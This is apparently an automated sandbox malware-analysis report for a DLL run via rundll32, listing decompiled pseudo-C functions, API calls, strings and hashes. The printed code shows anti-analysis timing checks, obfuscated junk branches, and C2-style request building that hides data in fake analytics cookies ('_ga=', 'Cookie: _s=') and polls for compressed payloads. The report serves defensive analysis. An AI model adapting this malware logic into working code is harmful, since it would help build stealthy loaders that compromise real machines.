                                              • API String ID: 911557368-0
                                              • Opcode ID: 87f2df61503c43403be47c73b52c885253801360124acf11aa6c9924d5a50bed
                                              • Instruction ID: 6bf3646277ed7659d23c391addaeef7dd43479a1e5d5f4f4aeea11294e6aed9e
                                              • Opcode Fuzzy Hash: 87f2df61503c43403be47c73b52c885253801360124acf11aa6c9924d5a50bed
                                              • Instruction Fuzzy Hash: C3D01231200248C7F2DBA721E8183EC3164A308382F90C129A106444E08F380B8C8304
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 000007FEF75336FA Relevance: 1.6, APIs: 1, Instructions: 79COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 401 7fef75336fa-7fef7533706 402 7fef7533721-7fef753372d 401->402 403 7fef7533708-7fef7533712 call 7fef7537947 401->403 405 7fef753372f-7fef753373b call 7fef7537947 402->405 406 7fef75336ec-7fef75336f5 402->406 411 7fef7533845-7fef7533852 403->411 413 7fef753373d-7fef753374b 405->413 414 7fef7533717-7fef753371f 405->414 407 7fef75339b9-7fef75339be 406->407 410 7fef75339d0-7fef75339f8 407->410 415 7fef7533854-7fef7533a3b 411->415 416 7fef75337ff-7fef753380c call 7fef753a588 411->416 418 7fef753375b-7fef7533765 413->418 419 7fef753374d-7fef7533759 413->419 414->403 424 7fef7533a4f-7fef7533a58 415->424 425 7fef7533a3d-7fef7533a43 415->425 428 7fef753380e-7fef7533818 416->428 429 7fef753381a-7fef7533826 416->429 418->405 423 7fef7533767-7fef75339aa call 7fef7538d0b 418->423 419->418 419->423 423->407 435 7fef75339ac-7fef75339b2 423->435 424->410 425->424 428->429 432 7fef7533828-7fef7533843 RtlAllocateHeap 428->432 429->428 429->432 432->411 432->415 435->407 436 7fef75339b4 435->436 436->401
                                              C-Code - Quality: 72%
                                              			E000007FE7FEF75336FA(void* __ebx, void* __edx, void* __edi, void* __esi, void* __esp, intOrPtr* _a8, intOrPtr* _a16, signed int _a33, char _a36, char _a37, long long _a40, long long _a48, long long _a56, signed int _a64, long long _a72, long long _a80, long long _a88, long long _a96, void* _a136) {
				unsigned int _v48;
				intOrPtr _v64;
				intOrPtr* _v72;
				unsigned int _v80;
				char _v87;
				char _v88;
				long long _v104;
				signed long long _v112;
				intOrPtr _t63;
				intOrPtr _t64;
				intOrPtr _t65;
				signed int _t70;
				signed int _t71;
				intOrPtr _t76;
				signed int _t77;
				signed int _t78;
				void* _t82;
				signed int _t87;
				void* _t92;
				void* _t101;
				long long _t128;
				long long _t129;
				long long _t130;
				long long _t132;
				long long _t133;
				void* _t140;
				void* _t141;
				intOrPtr* _t154;
				long long _t155;
				void* _t156;
				void* _t157;
				void* _t158;
				void* _t159;
				void* _t160;
				void* _t161;
				void* _t162;
				void* _t163;
				void* _t164;
				void* _t165;
				void* _t166;
				void* _t167;
				void* _t168;

				_t92 = __edx;
				_t128 = _a56 + 2;
				if (__esp == __esp) goto 0xf7533721;
				_t64 = E000007FE7FEF7537947(_t63, __ebx, _t82, __edx, __edi, __esi, _t128, _t140, _t141, _t157, _t160, _t162, _t164, _t166, _t168);
				_a96 = _t128;
				goto 0xf7533845;
				goto 0xf7533708;
				_a56 = _t128;
				_t129 = _a40;
				if (_t64 == _t64) goto 0xf75336ec;
				_t65 = E000007FE7FEF7537947(_t64, __ebx, 0xd45a1e1f, _t92, __edi, __esi, _t129, _t140, _t141, _t157, _t160, _t162, _t164, _t166, _t168);
				_a88 = _t129;
				if (_t92 == _t92) goto 0xf7533717;
				 *((intOrPtr*)(_a136 + 8)) = _t65;
				if (__esi == __esi) goto 0xf753375b;
				r8d = r8d + 2;
				if (0xd45a1e1f == 0xd45a1e1f) goto 0xf7533767;
				if (0x67cc0818 == 0x67cc0818) goto 0xf753372f;
				_t143 = _a56;
				E000007FE7FEF7538D0B(_t65, 0x67cc0818, __esi, _t101, __esp, _t129, _a56,  &_a36, _t156, _t157, _t158, _t160, _t162, _t163, _t164, _t165, _t166, _t167);
				_a96();
				_t87 = _a33;
				E000007FE7FEF7533D78(_t87, __esp, _t129, _t140, _t143,  &_a36, _t157, _t158, _t162, _t166, _t167);
				if (_t87 == _t87) goto 0xf75337c0;
				_t70 = _t87;
				if (_t92 == _t92) goto 0xf753379e;
				_t154 = _a136;
				if (__ebx == __ebx) goto 0xf7533776;
				_t71 = _t70 << 4;
				_a64 = _t71;
				if (_t71 == _t71) goto 0xf7533786;
				if ((_a64 | _t71) == (_a64 | _t71)) goto 0xf7533793;
				_t155 =  *_t154;
				 *(_t155 +  *((intOrPtr*)(_t129 + 0x30))) = _t71;
				goto 0xf75337d7;
				goto 0xf75339c6;
				if (_a48 - _t129 >= 0) goto 0xf75337d7;
				_t130 = _a48;
				goto 0xf75337f2;
				goto 0xf753395d;
				_a80 = _t130;
				E000007FE7FEF753A588(1, _t140, _t155, _t156, _t162, _t163, _t164, _t166, _t168);
				if (__edi == __edi) goto 0xf753381a;
				_t161 = _a56 + _t130;
				if (__ebx == __ebx) goto 0xf7533828;
				if (__esp == __esp) goto 0xf753380e;
				if (__esp == __esp) goto 0xf7533834; // executed
				RtlAllocateHeap(??, ??, ??);
				if (__edi == __edi) goto 0xf7533854;
				_t132 = _a136;
				_t76 =  *((intOrPtr*)(_t132 + 8));
				if (__ebx == __ebx) goto 0xf75337ff;
				 *_a136 = _t132;
				_t133 = _a136;
				r8d = r8d + 0xf;
				if (0 == 0) goto 0xf753386e;
				_t152 = _a136;
				_t77 = E000007FE7FEF7538E8D(_t76, _t140, _t152, _t155, _t156, _t157, _t158, _t161, _t162, _t164, _t165, _t166, _t167, _t168);
				if (0 == 0) goto 0xf75338b6;
				_a36 = _a36 + 0x24;
				_a37 = 5;
				goto 0xf7533898;
				_a37 = _a37 + 0x73;
				r8d = 0;
				goto 0xf753374d;
				_a56 = _t133;
				_a36 = 0xc;
				if (_t77 == _t77) goto 0xf753388c;
				_t78 = _t77 / _t152;
				if (_t78 == _t78) goto 0xf7533880;
				_a72 = _a40;
				goto 0xf753391b;
				_t159 = _t159 - 0x78;
				goto 0xf7533b2c;
				_v104 = _t155;
				_v112 = _t152;
				if (__esi == __esi) goto 0xf75338d3;
				_t152 =  *_a8;
				E000007FE7FEF75390C0( *((intOrPtr*)(_a40 + 8)), _a8, _t140,  *_a8, _t155, _t156, _t157, _t162, _t163, _t164, _t165, _t167, _t168);
				goto 0xf7533b3f;
				goto 0xf75338a8;
				if ( *_a8 == 0) goto 0xf7533900;
				_t78 = 0;
				goto 0xf7533900;
				_v80 = _v48;
				goto L8;
				_v87 = __al;
				goto 0xf7533b1e;
				__rcx = _a16;
				__eax = E000007FE7FEF7538E8D(__eax, __rbx, __rcx, __rdx, __rdi, __rsi, __rbp, __r8, __r9, __r11, __r12, __r13, __r14, __r15);
				if (__ah == __ah) goto 0xf753399d;
				_v88 = __al;
				__rax = _v72;
				if (__dx == __dx) goto 0xf7533990;
				r8d = r8d + 0xf;
				__edx = 0;
				if (__dl == __dl) goto 0xf7533934;
				__rax = __rcx;
				__al =  *__rax;
				if (__bx == __bx) goto 0xf7533945;
				__rcx = _a16;
				__r8 =  *__rcx;
				__eax = E000007FE7FEF7533B56(__ecx, 0, __ebp, __rax, __rdx, __rsi, __rbp, __r8, __r11, __r13, __r14);
				goto 0xf7533b0f;
				__rax = __rcx;
				__al =  *((intOrPtr*)(__rax + 1));
				if (__di == __di) goto 0xf7533927;
				_v64 = _v64 + __rax;
				if (__ax == __ax) goto 0xf7533985;
				__eax = E000007FE7FEF753A588(__eax, __rbx, __rdx, __rdi, __r9, __r10, __r11, __r13, __r15);
				__rax =  *((intOrPtr*)(__rax + 0x60));
				goto 0xf7533967;
				if (__eax != 0) goto 0xf75339b9;
				if (_v80 - 2 < 0) goto 0xf75339b9;
				goto E000007FE7FEF75336FA;
				_v80 = _v80 >> 1;
				goto 0xf753373d;
				__rsp = __rsp + 0x78;
				return __eax;
			}













































                                              0x7fef75336fa
                                              0x7fef75336ff
                                              0x7fef7533706
                                              0x7fef7533708
                                              0x7fef753370d
                                              0x7fef7533712
                                              0x7fef753371f
                                              0x7fef7533721
                                              0x7fef7533726
                                              0x7fef753372d
                                              0x7fef753372f
                                              0x7fef7533734
                                              0x7fef753373b
                                              0x7fef7533745
                                              0x7fef753374b
                                              0x7fef753374d
                                              0x7fef7533759
                                              0x7fef7533765
                                              0x7fef7533767
                                              0x7fef753376c
                                              0x7fef7533776
                                              0x7fef7533786
                                              0x7fef753378a
                                              0x7fef7533791
                                              0x7fef7533793
                                              0x7fef753379c
                                              0x7fef75337a1
                                              0x7fef75337b3
                                              0x7fef75337b5
                                              0x7fef75337b8
                                              0x7fef75337be
                                              0x7fef75337c8
                                              0x7fef75337ca
                                              0x7fef75337cd
                                              0x7fef75337d5
                                              0x7fef75337df
                                              0x7fef75337e9
                                              0x7fef75337eb
                                              0x7fef75337f0
                                              0x7fef75337fa
                                              0x7fef75337ff
                                              0x7fef7533804
                                              0x7fef753380c
                                              0x7fef753380e
                                              0x7fef7533818
                                              0x7fef7533826
                                              0x7fef7533832
                                              0x7fef7533834
                                              0x7fef7533843
                                              0x7fef7533845
                                              0x7fef753384d
                                              0x7fef7533852
                                              0x7fef7533854
                                              0x7fef7533857
                                              0x7fef7533864
                                              0x7fef753386c
                                              0x7fef753386e
                                              0x7fef7533876
                                              0x7fef753388a
                                              0x7fef753388c
                                              0x7fef7533891
                                              0x7fef7533896
                                              0x7fef7533898
                                              0x7fef753389d
                                              0x7fef75338a3
                                              0x7fef75338a8
                                              0x7fef75338ad
                                              0x7fef75338b4
                                              0x7fef75338b6
                                              0x7fef75338c7
                                              0x7fef75338cc
                                              0x7fef75338d1
                                              0x7fef75338d3
                                              0x7fef75338df
                                              0x7fef75338e4
                                              0x7fef75338e9
                                              0x7fef75338f1
                                              0x7fef75338f3
                                              0x7fef75338f6
                                              0x7fef75338fb
                                              0x7fef753390b
                                              0x7fef7533910
                                              0x7fef7533912
                                              0x7fef7533919
                                              0x7fef7533920
                                              0x7fef7533925
                                              0x7fef7533927
                                              0x7fef753392f
                                              0x7fef7533934
                                              0x7fef753393c
                                              0x7fef7533943
                                              0x7fef7533945
                                              0x7fef7533949
                                              0x7fef7533951
                                              0x7fef7533953
                                              0x7fef7533957
                                              0x7fef753395b
                                              0x7fef753395d
                                              0x7fef7533960
                                              0x7fef7533965
                                              0x7fef7533967
                                              0x7fef753396f
                                              0x7fef753397b
                                              0x7fef7533980
                                              0x7fef7533985
                                              0x7fef7533988
                                              0x7fef753398e
                                              0x7fef7533995
                                              0x7fef753399b
                                              0x7fef753399d
                                              0x7fef75339a2
                                              0x7fef75339a6
                                              0x7fef75339aa
                                              0x7fef75339b2
                                              0x7fef75339b4
                                              0x7fef75339be
                                              0x7fef75339c1
                                              0x7fef75339c6
                                              0x7fef75339ca

                                              Memory Dump Source
                                              • Source File: 00000005.00000002.944274000.000007FEF7531000.00000020.00000001.01000000.00000004.sdmp, Offset: 000007FEF7530000, based on PE: true
                                              • Associated: 00000005.00000002.944267845.000007FEF7530000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000005.00000002.944315478.000007FEF7589000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_7fef7530000_rundll32.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a0d91fdd5af79526e3923e3149c9a47a0b6a76bd8d68c7b7180e430b89e6b421
                                              • Instruction ID: eea735149a1d30d49bcd2fea519f552185231c9fc5e7a59b1faca744e8d541c8
                                              • Opcode Fuzzy Hash: a0d91fdd5af79526e3923e3149c9a47a0b6a76bd8d68c7b7180e430b89e6b421
                                              • Instruction Fuzzy Hash: 3F317E66F2DA8681EAF0DA45D45037DA6D3E385B94F944139FE8E47BB4CE3CE9848700
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 000000018000244C Relevance: 1.5, APIs: 1, Instructions: 13threadCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.944227549.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                              • Associated: 00000005.00000002.944213734.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.944232122.0000000180004000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.944235804.0000000180006000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.944239829.0000000180008000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CreateThread
                                              • String ID:
                                              • API String ID: 2422867632-0
                                              • Opcode ID: fbaeb0b3df8bc0706df18155176e3e92b35199adaf84ebd6d827a6017e15e73c
                                              • Instruction ID: 91c5236132e037b4dad52b7741e0f6a58db73a54ac04ee9c9214898af67bde3f
                                              • Opcode Fuzzy Hash: fbaeb0b3df8bc0706df18155176e3e92b35199adaf84ebd6d827a6017e15e73c
                                              • Instruction Fuzzy Hash: 38D05E72A1024483E775D720A5063A93321A398359F80C205E64908954CF7DC25CC705
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Non-executed Functions

                                              Function 0000000180002AC0 Relevance: 3.0, APIs: 2, Instructions: 47threadCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 67%
                                              			E00000001180002AC0(intOrPtr __ebx, intOrPtr __edx, void* __eflags, signed int __rax, long long __rbx, signed int __rdx, long long __rsi) {
				signed int _t18;
				signed long long _t42;
				long long _t52;
				void* _t55;
				void* _t56;

				 *((long long*)(_t55 + 8)) = __rbx;
				 *((long long*)(_t55 + 0x10)) = _t52;
				 *((long long*)(_t55 + 0x18)) = __rsi;
				_t56 = _t55 - 0x30;
				SwitchToThread();
				asm("rdtsc");
				_t42 = __rdx << 0x20;
				asm("cpuid");
				 *((intOrPtr*)(_t56 + 0x20)) = 1;
				 *((intOrPtr*)(_t56 + 0x24)) = __ebx;
				 *((intOrPtr*)(_t56 + 0x28)) = 0;
				 *((intOrPtr*)(_t56 + 0x2c)) = __edx;
				asm("rdtsc");
				_t43 = _t42 << 0x20;
				_t18 = SwitchToThread();
				asm("rdtsc");
				asm("rdtsc");
				if (__eflags != 0) goto 0x80002adb;
				return _t18 / (__rsi + ((__rax | _t42 | _t42 << 0x00000020) - (__rax | _t42) | _t43 << 0x00000020 | _t43 << 0x00000020 << 0x00000020) - ((__rax | _t42 | _t42 << 0x00000020) - (__rax | _t42) | _t43 << 0x00000020));
			}








                                              0x180002ac0
                                              0x180002ac5
                                              0x180002aca
                                              0x180002ad0
                                              0x180002adb
                                              0x180002ae1
                                              0x180002ae3
                                              0x180002af4
                                              0x180002af6
                                              0x180002afa
                                              0x180002afe
                                              0x180002b02
                                              0x180002b06
                                              0x180002b08
                                              0x180002b15
                                              0x180002b1b
                                              0x180002b28
                                              0x180002b3b
                                              0x180002b59

                                              APIs
                                              • SwitchToThread.KERNEL32(?,?,?,?,?,0000000180002D01,?,?,?,?,00000004,00000001800027CB), ref: 0000000180002ADB
                                              • SwitchToThread.KERNEL32(?,?,?,?,?,0000000180002D01,?,?,?,?,00000004,00000001800027CB), ref: 0000000180002B15
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.944227549.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                              • Associated: 00000005.00000002.944213734.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.944232122.0000000180004000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.944235804.0000000180006000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.944239829.0000000180008000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: SwitchThread
                                              • String ID:
                                              • API String ID: 115865932-0
                                              • Opcode ID: daa6dbe73eacbe07049e851a88da4fb5940b4517f947b52f7d3a30b83cf7e21a
                                              • Instruction ID: 31e80d72c3d44f8f19491c3afcfcc8ffca94b91b5460d3bc01de11eb56bf2daf
                                              • Opcode Fuzzy Hash: daa6dbe73eacbe07049e851a88da4fb5940b4517f947b52f7d3a30b83cf7e21a
                                              • Instruction Fuzzy Hash: 93019EB2B24A948BDF64CB26B600389B6A2E38C7C0F14C535EB9D43B18DA3CD5958B04
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0000000180001904 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 74libraryloaderCOMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.944227549.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                              • Associated: 00000005.00000002.944213734.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.944232122.0000000180004000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.944235804.0000000180006000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.944239829.0000000180008000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: wsprintf$AddressLibraryLoadProc
                                              • String ID: %s%u$; _gat=$NTDLL.DLL$RtlGetVersion
                                              • API String ID: 1873754389-181482773
                                              • Opcode ID: 9bf10ddb181b82f56210e5c52edef951daa22d2c9024343e49e45360ad26c2da
                                              • Instruction ID: b0e16dee8d78cd610c3fce9f61b73237315bc0fd6264dbce3c4a8d294556f37b
                                              • Opcode Fuzzy Hash: 9bf10ddb181b82f56210e5c52edef951daa22d2c9024343e49e45360ad26c2da
                                              • Instruction Fuzzy Hash: A1311872B00A4991EA62DB11F854BE97360FB9CBC5F848126EA0D67B65DF3CC61EC340
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0000000180001F2C Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 55stringCOMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.944227549.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                              • Associated: 00000005.00000002.944213734.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.944232122.0000000180004000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.944235804.0000000180006000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.944239829.0000000180008000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcpy$lstrcat$FolderPath
                                              • String ID: c:\ProgramData\
                                              • API String ID: 2440492483-4167965204
                                              • Opcode ID: 05fb9603890ea37e221d746ad0541c6ddcf55fa1bfb4c4ac4fb54a3c77e688cc
                                              • Instruction ID: 13a3a00d3bf98ac6014c4b177c238986472ee82a99ac8020d1391539c79a1c4f
                                              • Opcode Fuzzy Hash: 05fb9603890ea37e221d746ad0541c6ddcf55fa1bfb4c4ac4fb54a3c77e688cc
                                              • Instruction Fuzzy Hash: A8213472204B84C6EB52DF21E8043EAB765F758BC4F888021EE990BB69CF78C25DC714
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0000000180001688 Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 50stringCOMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.944227549.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                              • Associated: 00000005.00000002.944213734.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.944232122.0000000180004000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.944235804.0000000180006000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.944239829.0000000180008000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcat$CreateDirectoryFolderPathlstrcpy
                                              • String ID: c:\ProgramData\
                                              • API String ID: 1583731639-4167965204
                                              • Opcode ID: 7e935584a37d3d6361fc61349a1cd69af6c5b8f1aabd1db1f1d05e25f9d24d15
                                              • Instruction ID: 6a04e3bab3544b7625e32e0bbe63c8079b4262e858a91f78b1d04aa0cec903dd
                                              • Opcode Fuzzy Hash: 7e935584a37d3d6361fc61349a1cd69af6c5b8f1aabd1db1f1d05e25f9d24d15
                                              • Instruction Fuzzy Hash: 4B211A72214A8A96EB51CF11E8447CE7364F788BC8F959022EA5E57668DF38C60ECB44
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00000001800027B4 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 37COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 25%
                                              			E000000011800027B4(void* __rax, void* __rbx, void* __rcx, void* _a8) {
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				void* __rdi;
				void* _t20;
				void* _t45;

				E00000001180002C88(_t20, __rbx,  &_v24, __rcx, _t45, __rbx);
				r9d = _v24;
				wsprintfW(??, ??);
				r9d = _v20;
				wsprintfW(??, ??);
				r9d = _v12;
				wsprintfW(??, ??);
				r9d = _v16;
				wsprintfW(??, ??);
				return __rax;
			}










                                              0x1800027c6
                                              0x1800027cb
                                              0x1800027e1
                                              0x1800027e7
                                              0x180002801
                                              0x180002807
                                              0x180002824
                                              0x18000282a
                                              0x180002847
                                              0x18000285c

                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.944227549.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                              • Associated: 00000005.00000002.944213734.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.944232122.0000000180004000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.944235804.0000000180006000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.944239829.0000000180008000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: wsprintf
                                              • String ID: %s%u$; _ga=
                                              • API String ID: 2111968516-3272795577
                                              • Opcode ID: 39cfa979455bf35acecfaf6dc8e91e934a285b7c36309477a7fead913413f592
                                              • Instruction ID: 8dfdff9f2ba73ed5fda4775318dfd5996efea46270aa07bd7b9716fa6782b752
                                              • Opcode Fuzzy Hash: 39cfa979455bf35acecfaf6dc8e91e934a285b7c36309477a7fead913413f592
                                              • Instruction Fuzzy Hash: 80119672704A4A92DA62CF14F5547E97320FB5C789F848226EA4D27A76DE3CC62EC740
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0000000180001D80 Relevance: 9.1, APIs: 6, Instructions: 62memorysleepCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 43%
                                              			E00000001180001D80(void* __edx, void* __eflags, void* __rax, long long __rbx, void* __rcx, void* __rdx, long long __rsi, long long __rbp, intOrPtr* __r8, long long* __r9, void* __r11, void* __r14, long long _a8, long long _a16, long long _a24) {
				void* _v8;
				char _v136;
				void* __rdi;
				void* _t12;
				char* _t37;
				intOrPtr* _t51;
				void* _t66;

				_t66 = __r11;
				_a8 = __rbx;
				_a16 = __rbp;
				_a24 = __rsi;
				_t51 = __r8;
				wsprintfW(??, ??);
				_t12 = E00000001180001B08( &_v136, __rdx, __r8, __r9);
				_t37 =  *_t51;
				if (_t12 == 0x194) goto 0x80001e2e;
				if (_t12 != 0xc8) goto 0x80001e01;
				if (_t37 == 0) goto 0x80001e1a;
				if ( *__r9 - 0x400 < 0) goto 0x80001e01;
				if ( *_t37 != 0x1f) goto 0x80001e01;
				if ( *((char*)(_t37 + 1)) != 0x8b) goto 0x80001e01;
				if (E00000001180001760(_t37, _t51, __r9, __r9, _t51, _t66, __r14) != 0) goto 0x80001e27;
				if (_t37 == 0) goto 0x80001e1a;
				GetProcessHeap();
				HeapFree(??, ??, ??);
				Sleep(??);
				goto 0x80001db5;
				goto 0x80001e49;
				if (_t37 == 0) goto 0x80001e47;
				GetProcessHeap();
				HeapFree(??, ??, ??);
				return 0;
			}










                                              0x180001d80
                                              0x180001d80
                                              0x180001d85
                                              0x180001d8a
                                              0x180001d97
                                              0x180001daf
                                              0x180001dc3
                                              0x180001dc8
                                              0x180001dd0
                                              0x180001dd7
                                              0x180001ddc
                                              0x180001de5
                                              0x180001dea
                                              0x180001df0
                                              0x180001dff
                                              0x180001e04
                                              0x180001e06
                                              0x180001e14
                                              0x180001e1f
                                              0x180001e25
                                              0x180001e2c
                                              0x180001e31
                                              0x180001e33
                                              0x180001e41
                                              0x180001e61

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.944227549.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                              • Associated: 00000005.00000002.944213734.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.944232122.0000000180004000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.944235804.0000000180006000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.944239829.0000000180008000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Heap$FreeProcess$Sleepwsprintf
                                              • String ID:
                                              • API String ID: 2048420019-0
                                              • Opcode ID: 5d16a19e01451f386ef0ae26424dbe1b79c541dbd7bb336a880d3781391ae622
                                              • Instruction ID: a2cd984f53a93593caa01796726c62d074961a460daaaee6897d674b1d8fdaee
                                              • Opcode Fuzzy Hash: 5d16a19e01451f386ef0ae26424dbe1b79c541dbd7bb336a880d3781391ae622
                                              • Instruction Fuzzy Hash: 06213872604BC8CAFBA2DB22E4043D97295AB5DBC2F48C131EF495B795DF38C6498341
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0000000180001B5C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29memoryCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 33%
                                              			E00000001180001B5C(void* __edx, void* __rax, long long __rbx, void* __rcx, long long __rsi, long long _a8, long long _a16) {
				void* _t13;
				void* _t29;

				_a8 = __rbx;
				_a16 = __rsi;
				_t13 = __edx;
				GetProcessHeap();
				r8d = 0x2001;
				HeapAlloc(??, ??, ??);
				if (__rax == 0) goto 0x80001bc2;
				E000000011800014B4(__rax, __rax, __rax, L"Cookie: _s=", __rcx, _t29, __rcx);
				r9d = _t13;
				return wsprintfW(??, ??);
			}





                                              0x180001b5c
                                              0x180001b61
                                              0x180001b6b
                                              0x180001b70
                                              0x180001b7b
                                              0x180001b84
                                              0x180001b90
                                              0x180001b9f
                                              0x180001ba4
                                              0x180001bd1

                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.944227549.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                              • Associated: 00000005.00000002.944213734.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.944232122.0000000180004000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.944235804.0000000180006000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.944239829.0000000180008000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Heap$Process$AllocFreewsprintf
                                              • String ID: %s%u$Cookie: _s=
                                              • API String ID: 4121094037-887366058
                                              • Opcode ID: 74adba2fbfe221d9218fc22692f7f932e8ec014434834bf0c5ddf0096d87e161
                                              • Instruction ID: 843dd351c34123922bb2a738a6afe93933f5c472e56c7fab694ad2d1448e7ea3
                                              • Opcode Fuzzy Hash: 74adba2fbfe221d9218fc22692f7f932e8ec014434834bf0c5ddf0096d87e161
                                              • Instruction Fuzzy Hash: 65F03772700B8981EA92CB0AF4443D93660F78CBC0F489124EE4E1B76ADE3CC64AC340
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0000000180002B5C Relevance: 7.6, APIs: 5, Instructions: 87memoryCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 29%
                                              			E00000001180002B5C(signed int __rax, long long __rbx, void* __rcx, void* __rdx, long long __rsi, long long __rbp, void* __r8, void* __r9, void* __r10, void* _a8, long long _a16, long long _a24, long long _a32) {
				void* __rdi;
				signed int _t43;
				intOrPtr _t54;
				void* _t56;
				void* _t61;
				signed long long _t63;
